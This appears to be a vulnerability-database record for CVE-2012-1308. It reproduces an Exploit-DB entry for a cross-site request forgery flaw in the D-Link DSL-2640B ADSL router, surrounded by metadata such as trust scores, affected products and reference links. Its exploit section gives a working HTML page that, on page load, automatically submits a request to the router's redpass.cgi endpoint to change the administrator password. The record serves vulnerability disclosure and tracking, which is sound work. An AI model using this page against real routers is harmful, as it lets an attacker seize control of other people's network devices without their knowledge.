ID
VAR-E-201202-0295
CVE
| cve_id: | CVE-2012-1308 | Trust: 1.9 |
EDB ID
18499
TITLE
D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery. CVE-80803CVE-2012-1308 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dsl-2640b adsl router | scope: | - | version: | - | Trust: 1.0 |
| vendor: | d link | model: | dsl-2640b | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date : 19-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Vendor site : http://www.d-link.com
# Version : DSL-2640B
# Tested on : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
1)Introduction
2)Vulnerability Description
3)Exploit
+---------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
2)Vulnerability Description
The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router
parameters and -among other things- to change default administrator("admin") password.
3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
CREDITS
Ivano Binetti
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2012-1308 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 18499 | Trust: 1.6 |
| db: | EDBNET | id: | 40864 | Trust: 0.6 |
| db: | BID | id: | 52096 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-1308 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/18499/ | Trust: 0.6 |
| url: | http://www.d-link.com | Trust: 0.3 |
| url: | http://www.d-link.com/products/?pid=567 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 52096 |
| db: | EXPLOIT-DB | id: | 18499 |
| db: | EDBNET | id: | 40864 |
LAST UPDATE DATE
2022-07-27T09:56:52.840000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 52096 | date: | 2012-10-10T18:10:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 52096 | date: | 2012-02-21T00:00:00 |
| db: | EXPLOIT-DB | id: | 18499 | date: | 2012-02-20T00:00:00 |
| db: | EDBNET | id: | 40864 | date: | 2012-02-20T00:00:00 |